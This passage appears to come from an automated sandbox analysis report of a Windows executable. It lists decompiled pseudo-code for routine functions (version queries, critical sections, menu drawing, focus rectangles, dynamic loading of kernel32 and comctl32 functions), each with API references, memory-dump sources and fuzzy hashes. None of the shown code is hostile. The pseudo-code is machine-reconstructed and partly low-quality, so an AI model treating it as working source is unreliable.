					_t49 = _t24;
					_push(_t49);
					L00406AAC();
					_t40 = _t24;
					if(_t40 == 0) {
						goto L6;
					} else {
						_v16 = E00402754(_t40);
						_push(_t51);
						_push(0x46cd05);
						_push( *[fs:eax]);
						 *[fs:eax] = _t53;
						_push(_v16);
						_push(_t40);
						_t29 = _v12;
						_push(_t29);
						_push(_t49);
						L00406AA4();
						if(_t29 != 0) {
							_push( &_v24);
							_push( &_v20);
							_push("\\");
							_t35 = _v16;
							_push(_t35);
							L00406AB4();
							if(_t35 != 0) {
								 *0x496c98 =  *((intOrPtr*)(_v20 + 8));
							}
						}
						_pop(_t47);
						 *[fs:eax] = _t47;
						_push(0x46cd0c);
						return E00402774(_v16);
					}
				}
			}


















                                                                        0x0046cc51
                                                                        0x0046cc53
                                                                        0x0046cc5a
                                                                        0x0046cc5f
                                                                        0x0046cc60
                                                                        0x0046cc65
                                                                        0x0046cc68
                                                                        0x0046cc72
                                                                        0x0046cd0c
                                                                        0x0046cd14
                                                                        0x0046cd17
                                                                        0x0046cd1a
                                                                        0x0046cd27
                                                                        0x0046cc78
                                                                        0x0046cc80
                                                                        0x0046cc88
                                                                        0x0046cc8c
                                                                        0x0046cc91
                                                                        0x0046cc93
                                                                        0x0046cc94
                                                                        0x0046cc99
                                                                        0x0046cc9d
                                                                        0x00000000
                                                                        0x0046cc9f
                                                                        0x0046cca6
                                                                        0x0046ccab
                                                                        0x0046ccac
                                                                        0x0046ccb1
                                                                        0x0046ccb4
                                                                        0x0046ccba
                                                                        0x0046ccbb
                                                                        0x0046ccbc
                                                                        0x0046ccbf
                                                                        0x0046ccc0
                                                                        0x0046ccc1
                                                                        0x0046ccc8
                                                                        0x0046cccd
                                                                        0x0046ccd1
                                                                        0x0046ccd2
                                                                        0x0046ccd7
                                                                        0x0046ccda
                                                                        0x0046ccdb
                                                                        0x0046cce2
                                                                        0x0046ccea
                                                                        0x0046ccea
                                                                        0x0046cce2
                                                                        0x0046ccf1
                                                                        0x0046ccf4
                                                                        0x0046ccf7
                                                                        0x0046cd04
                                                                        0x0046cd04
                                                                        0x0046cc9d

                                                                        APIs
                                                                        • 739414E0.VERSION(00000000,?,00000000,0046CD28), ref: 0046CC94
                                                                        • 739414C0.VERSION(00000000,?,00000000,?,00000000,0046CD05,?,00000000,?,00000000,0046CD28), ref: 0046CCC1
                                                                        • 73941500.VERSION(?,0046CD50,?,?,00000000,?,00000000,?,00000000,0046CD05,?,00000000,?,00000000,0046CD28), ref: 0046CCDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 739414$73941500
                                                                        • String ID: comctl32.dll
                                                                        • API String ID: 1696551078-431930879
                                                                        • Opcode ID: 4370ec33bb2a3535abdd9756b92c62f29a947cde4d107e1b0ccf349f1ab6d9cc
                                                                        • Instruction ID: 7ec7435803e1971a03311a5c6c3e11d69c247d37a00d9ae0bfaa4f5d1cfef9b6
                                                                        • Opcode Fuzzy Hash: 4370ec33bb2a3535abdd9756b92c62f29a947cde4d107e1b0ccf349f1ab6d9cc
                                                                        • Instruction Fuzzy Hash: 8D214F75600208AFDB01EFA9DC91DAE77FCEB49300B524477F944E3691E778AE008A69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00424D94, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E00424D94(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E004035AC(1);
				_push(_t77);
				_push(0x424e1b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x41232c; // 0x412378
				 *((intOrPtr*)(_v12 + 0x6c)) = E0040378C(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x496a44);
				L004068AC();
				_push(_t77);
				_push(0x424e7b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00423828( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00423824(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E00424E82);
				_push(0x496a44);
				L004069F4();
				return 0;
			}












                                                                        0x00424d95
                                                                        0x00424d97
                                                                        0x00424da1
                                                                        0x00424db0
                                                                        0x00424db5
                                                                        0x00424db6
                                                                        0x00424dbb
                                                                        0x00424dbe
                                                                        0x00424dc4
                                                                        0x00424dca
                                                                        0x00424ddd
                                                                        0x00424ddd
                                                                        0x00424de5
                                                                        0x00424def
                                                                        0x00424dfa
                                                                        0x00424dfa
                                                                        0x00424e00
                                                                        0x00424e0e
                                                                        0x00424e13
                                                                        0x00424e16
                                                                        0x00424e32
                                                                        0x00424e37
                                                                        0x00424e3e
                                                                        0x00424e3f
                                                                        0x00424e44
                                                                        0x00424e47
                                                                        0x00424e50
                                                                        0x00424e5b
                                                                        0x00424e5e
                                                                        0x00424e65
                                                                        0x00424e68
                                                                        0x00424e6b
                                                                        0x00424e70
                                                                        0x00424e75
                                                                        0x00424e7a

                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A44,00000000,?,?), ref: 00424E37
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A44,00424E82,00496A44,00000000,?,?), ref: 00424E75
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave
                                                                        • String ID: x#A$A
                                                                        • API String ID: 3168844106-3646173994
                                                                        • Opcode ID: 5bbfe59eb37763ef439f0b7999e1da932612e69aa8afa73a8559403d71184419
                                                                        • Instruction ID: 96df8752f16c2a0022fc4abf683c0cece092d4dd73ebd9113d8584cb1a2c50fe
                                                                        • Opcode Fuzzy Hash: 5bbfe59eb37763ef439f0b7999e1da932612e69aa8afa73a8559403d71184419
                                                                        • Instruction Fuzzy Hash: FC217175A04304AFDB11DF69D88184ABBF5FB89720B5285AAF804A7761C678EE40CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00449AD8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E00449AD8(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x495c50; // 0x4967f0
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E00449E5C(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E00449E5C(_t29) & 0x0000007f) << 0x0000000d) + ((E00449E5C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                                                        0x00449ada
                                                                        0x00449add
                                                                        0x00449adf
                                                                        0x00449ae8
                                                                        0x00449aff
                                                                        0x00449b01
                                                                        0x00449b08
                                                                        0x00449b14
                                                                        0x00449b18
                                                                        0x00449b26
                                                                        0x00449b2d
                                                                        0x00449b31
                                                                        0x00449b43
                                                                        0x00449b48
                                                                        0x00449b66
                                                                        0x00449b6a
                                                                        0x00449b78
                                                                        0x00449b7f
                                                                        0x00000000
                                                                        0x00449b85
                                                                        0x00449b7f
                                                                        0x00449b48
                                                                        0x00449b2d
                                                                        0x00449b92

                                                                        APIs
                                                                        • GetMenuItemInfoA.USER32 ref: 00449B26
                                                                        • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00449B78
                                                                        • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00449B85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$InfoItem$Draw
                                                                        • String ID: P
                                                                        • API String ID: 3227129158-3110715001
                                                                        • Opcode ID: 607a6fc08d128d85e62244aadbe68778596dafd5a8d92c3366002aec936c2e1b
                                                                        • Instruction ID: df4e8d69c2b8ab43fa3eab23de6c9c49e1d9bdfb9557a38750246fd9a3c36f3e
                                                                        • Opcode Fuzzy Hash: 607a6fc08d128d85e62244aadbe68778596dafd5a8d92c3366002aec936c2e1b
                                                                        • Instruction Fuzzy Hash: 5C116A30605A006BE310DB29CC81B4B7BD5EF8A364F14866AF094DB3D5D779DC859B8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043E42C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0043E42C(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t19;
				struct HWND__* _t20;
				intOrPtr* _t23;

				_t20 = __eax;
				_t1 =  &_a4; // 0x43e6e8
				_t23 =  *_t1;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 =  &_v12; // 0x43e6e8
				ClientToScreen(__eax, _t4);
				GetWindowRect(_t20,  &_v28);
				_t6 =  &_v12; // 0x43e6e8
				 *_t23 =  *_t6 - _v28.left;
				_t19 = _v8 - _v28.top;
				 *((intOrPtr*)(_t23 + 4)) = _t19;
				return _t19;
			}









                                                                        0x0043e434
                                                                        0x0043e436
                                                                        0x0043e436
                                                                        0x0043e439
                                                                        0x0043e43c
                                                                        0x0043e43f
                                                                        0x0043e444
                                                                        0x0043e44e
                                                                        0x0043e453
                                                                        0x0043e459
                                                                        0x0043e45e
                                                                        0x0043e461
                                                                        0x0043e469

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ClientRectScreenWindow
                                                                        • String ID: C$C
                                                                        • API String ID: 3371951266-238425240
                                                                        • Opcode ID: 9b613976ed8a943dd8438ef2838c6135eb1e66a4e2bc89180cf3e15dbfc731bf
                                                                        • Instruction ID: 1f4564615450670a25db1ca0009ad4615392a475f3aeb3dbd1faee911e03ac16
                                                                        • Opcode Fuzzy Hash: 9b613976ed8a943dd8438ef2838c6135eb1e66a4e2bc89180cf3e15dbfc731bf
                                                                        • Instruction Fuzzy Hash: D2F0A2B190120DAFCB00DFE9D9818DEFBFCEF08210F10416AA945E3341D631AA508BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040B418, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040B418() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x47a0e4 = _t1;
				}
				if( *0x47a0e4 == 0) {
					 *0x47a0e4 = E00408B84;
					return E00408B84;
				}
				return _t1;
			}





                                                                        0x0040b41e
                                                                        0x0040b423
                                                                        0x0040b427
                                                                        0x0040b42f
                                                                        0x0040b434
                                                                        0x0040b434
                                                                        0x0040b440
                                                                        0x0040b447
                                                                        0x00000000
                                                                        0x0040b447
                                                                        0x0040b44d

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C0F1,00000000,0040C104), ref: 0040B41E
                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B42F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                        • API String ID: 1646373207-3712701948
                                                                        • Opcode ID: e7fe911eb68f28c804d0767d7065684a7dc6f4c980445e1d1472f712646220be
                                                                        • Instruction ID: 6ae0bcb979b928d375a13ebc24deeef97ab0339ec59b2135f7a36ef93f1d17aa
                                                                        • Opcode Fuzzy Hash: e7fe911eb68f28c804d0767d7065684a7dc6f4c980445e1d1472f712646220be
                                                                        • Instruction Fuzzy Hash: 64D05EA020538A8ADB00FFB059C17153594C340708B04843BA106752D3C7BE49A0978E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004269FC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004269FC() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				if( *0x496a94 == 0) {
					_t1 = GetModuleHandleA("comctl32.dll");
					 *0x496a94 = _t1;
					if( *0x496a94 != 0) {
						_t2 =  *0x496a94; // 0x0
						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
						 *0x496a98 = _t3;
						return _t3;
					}
				}
				return _t1;
			}






                                                                        0x00426a03
                                                                        0x00426a0a
                                                                        0x00426a0f
                                                                        0x00426a1b
                                                                        0x00426a22
                                                                        0x00426a28
                                                                        0x00426a2d
                                                                        0x00000000
                                                                        0x00426a2d
                                                                        0x00426a1b
                                                                        0x00426a32

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(comctl32.dll,00426A6D,00000200,0046CC12), ref: 00426A0A
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00426A28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: InitCommonControlsEx$comctl32.dll
                                                                        • API String ID: 1646373207-802336580
                                                                        • Opcode ID: d8e2ff409dd9ceddfd3946d5ebc7b870927ac2dbee9e64dd0fd436275be675c0
                                                                        • Instruction ID: b485c5e37fb782eca6cace4d01e2d249d426e4b814a2065c8112e2717f591e71
                                                                        • Opcode Fuzzy Hash: d8e2ff409dd9ceddfd3946d5ebc7b870927ac2dbee9e64dd0fd436275be675c0
                                                                        • Instruction Fuzzy Hash: 70D09EB06412529FE700EFA4BD467117790D323705FA3C43BA04976DB1D67C2454C70C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00464658, Relevance: 6.2, APIs: 4, Instructions: 225windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E00464658(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
				char _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _v32;
				struct HWND__* _v36;
				signed short _v38;
				char _v39;
				char _v40;
				signed int _v52;
				void* __edi;
				void* __ebp;
				void* _t93;
				struct HWND__* _t94;
				signed int _t99;
				signed int _t100;
				signed int _t123;
				struct HWND__* _t125;
				signed int _t127;
				signed int _t129;
				void* _t131;
				struct HWND__* _t144;
				struct HWND__* _t145;
				intOrPtr _t148;
				void* _t152;
				struct HWND__* _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				struct HWND__* _t196;
				struct HWND__* _t200;
				long _t209;
				struct HWND__** _t212;
				void* _t213;

				_t180 = __ecx;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v32 = __ecx;
				_v8 = __eax;
				_t212 =  &_v8;
				_t93 = E00461DEC( *((intOrPtr*)( *_t212 + 0x29c)));
				_t214 =  *((intOrPtr*)(_t93 + 8));
				if( *((intOrPtr*)(_t93 + 8)) == 0) {
					E0041FC50( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
					return E004202E8( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
				}
				_t94 =  *_t212;
				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
				if( *((char*)(_t94 + 0x2e8)) != 1) {
					L10:
					_t209 = _v28.left;
					_v36 = E004641C0( *_t212, _v32);
					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
					__eflags = _t99;
					_t100 = _t99 >> 1;
					if(__eflags < 0) {
						asm("adc eax, 0x0");
					}
					_v52 = _t100;
					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
					E0042062C( *((intOrPtr*)( *_t212 + 0x208)));
					E0041FC50( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
					E004202E8( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
					_v12 = E0042056C(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
					__eflags =  *( *_t212 + 0x22c) - _v32;
					if(__eflags == 0) {
						E0041FC50( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
						E0041F464( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
					}
					_v40 =  *((intOrPtr*)(_v36 + 0x18));
					_v39 = E004627C4(_v36);
					_v38 = E00461ED8(_v36);
					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
					__eflags = _t123 - 5;
					if(__eflags > 0) {
						L22:
						_t125 =  *( *_t212 + 0x22c);
						__eflags = _t125 - _v32;
						if(_t125 != _v32) {
							goto L35;
						}
						_t125 = _v36;
						__eflags =  *(_t125 + 8);
						if( *(_t125 + 8) == 0) {
							goto L35;
						}
						_t127 =  *( *_t212 + 0x234);
						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
						_t196 =  *_t212;
						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
						if( *((char*)(_t196 + 0x2e0)) >= 4) {
							_v28.left = _v28.left - _v52;
							_t200 =  *_t212;
							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
								_t76 =  &_v28;
								 *_t76 = _v28.left + _t127;
								__eflags =  *_t76;
							}
						}
						_t129 =  *( *_t212 + 0x2e0);
						__eflags = _t129;
						if(_t129 != 0) {
							__eflags = _t129 - 4;
							if(_t129 != 4) {
								_t80 =  &_v28;
								 *_t80 = _v28.left +  *( *_t212 + 0x234);
								__eflags =  *_t80;
							}
						}
						__eflags = _t129 - 3;
						if(_t129 == 3) {
							_t83 =  &_v28;
							 *_t83 = _v28.left +  *( *_t212 + 0x234);
							__eflags =  *_t83;
						}
						_t131 = E0043CC2C( *_t212);
						_t125 = GetFocus();
						__eflags = _t131 - _t125;
						if(_t131 != _t125) {
							goto L35;
						} else {
							_t125 =  *_t212;
							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
								goto L35;
							}
							return DrawFocusRect(E00420730( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
						}
					} else {
						switch( *((intOrPtr*)(_t123 * 4 +  &M00464838))) {
							case 0:
								E00464230(_t213);
								goto L22;
							case 1:
								__eax = E0046443C(__edi, __esi, __ebp);
								goto L22;
							case 2:
								__eax = E0046438C(__edi, __ebp);
								goto L22;
							case 3:
								__eax = E00464280(__edi, __esi, __ebp);
								goto L22;
							case 4:
								__eax = E004644EC(__edi, __esi, __eflags, __ebp);
								goto L22;
							case 5:
								__eax = E00464574(__edi, __eflags, __ebp);
								goto L22;
						}
					}
				} else {
					_t144 =  *_t212;
					__eflags =  *((short*)(_t144 + 0x2f2));
					if( *((short*)(_t144 + 0x2f2)) == 0) {
						goto L10;
					}
					_t145 =  *_t212;
					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
						_t148 =  *0x464948; // 0x0
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
					}
					_t152 = E0043CC2C( *_t212);
					_t153 = GetFocus();
					__eflags = _t152 - _t153;
					if(_t152 != _t153) {
						_t155 =  *0x464944; // 0x1
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
					}
					_t159 =  *0x464940; // 0x11
					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
					_t125 =  *_t212;
					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
						L35:
						return _t125;
					}
					return DrawFocusRect(E00420730( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
				}
			}



































                                                                        0x00464658
                                                                        0x00464667
                                                                        0x00464668
                                                                        0x00464669
                                                                        0x0046466a
                                                                        0x0046466b
                                                                        0x0046466e
                                                                        0x00464671
                                                                        0x0046467c
                                                                        0x00464681
                                                                        0x00464685
                                                                        0x00464697
                                                                        0x00000000
                                                                        0x004646a1
                                                                        0x004646ab
                                                                        0x004646ad
                                                                        0x004646b4
                                                                        0x00464778
                                                                        0x00464778
                                                                        0x00464785
                                                                        0x00464790
                                                                        0x00464790
                                                                        0x00464796
                                                                        0x00464798
                                                                        0x0046479a
                                                                        0x0046479a
                                                                        0x0046479d
                                                                        0x004647a2
                                                                        0x004647af
                                                                        0x004647bc
                                                                        0x004647c6
                                                                        0x004647d9
                                                                        0x004647e4
                                                                        0x004647e7
                                                                        0x004647f1
                                                                        0x004647fe
                                                                        0x004647fe
                                                                        0x00464809
                                                                        0x00464814
                                                                        0x0046481f
                                                                        0x00464825
                                                                        0x0046482c
                                                                        0x0046482f
                                                                        0x00464884
                                                                        0x00464886
                                                                        0x0046488c
                                                                        0x0046488f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464895
                                                                        0x00464898
                                                                        0x0046489c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004648a4
                                                                        0x004648b6
                                                                        0x004648b9
                                                                        0x004648bb
                                                                        0x004648c2
                                                                        0x004648c7
                                                                        0x004648ca
                                                                        0x004648cc
                                                                        0x004648d3
                                                                        0x004648d5
                                                                        0x004648d5
                                                                        0x004648d5
                                                                        0x004648d5
                                                                        0x004648d3
                                                                        0x004648da
                                                                        0x004648e0
                                                                        0x004648e2
                                                                        0x004648e4
                                                                        0x004648e6
                                                                        0x004648f0
                                                                        0x004648f0
                                                                        0x004648f0
                                                                        0x004648f0
                                                                        0x004648e6
                                                                        0x004648f3
                                                                        0x004648f5
                                                                        0x004648ff
                                                                        0x004648ff
                                                                        0x004648ff
                                                                        0x004648ff
                                                                        0x00464904
                                                                        0x0046490b
                                                                        0x00464910
                                                                        0x00464912
                                                                        0x00000000
                                                                        0x00464914
                                                                        0x00464914
                                                                        0x00464916
                                                                        0x0046491d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464931
                                                                        0x00464831
                                                                        0x00464831
                                                                        0x00000000
                                                                        0x00464851
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046485a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046486c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464863
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464875
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046487e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464831
                                                                        0x004646ba
                                                                        0x004646ba
                                                                        0x004646bc
                                                                        0x004646c4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004646ca
                                                                        0x004646d2
                                                                        0x004646d5
                                                                        0x00464759
                                                                        0x00000000
                                                                        0x0046476d
                                                                        0x004646d9
                                                                        0x004646e0
                                                                        0x004646e5
                                                                        0x004646e7
                                                                        0x00464736
                                                                        0x00000000
                                                                        0x0046474a
                                                                        0x004646ed
                                                                        0x00464701
                                                                        0x00464707
                                                                        0x00464709
                                                                        0x00464710
                                                                        0x0046493c
                                                                        0x0046493c
                                                                        0x0046493c
                                                                        0x00000000
                                                                        0x00464728

                                                                        APIs
                                                                        • GetFocus.USER32 ref: 004646E0
                                                                        • DrawFocusRect.USER32 ref: 00464728
                                                                          • Part of subcall function 004202E8: FillRect.USER32 ref: 00420310
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
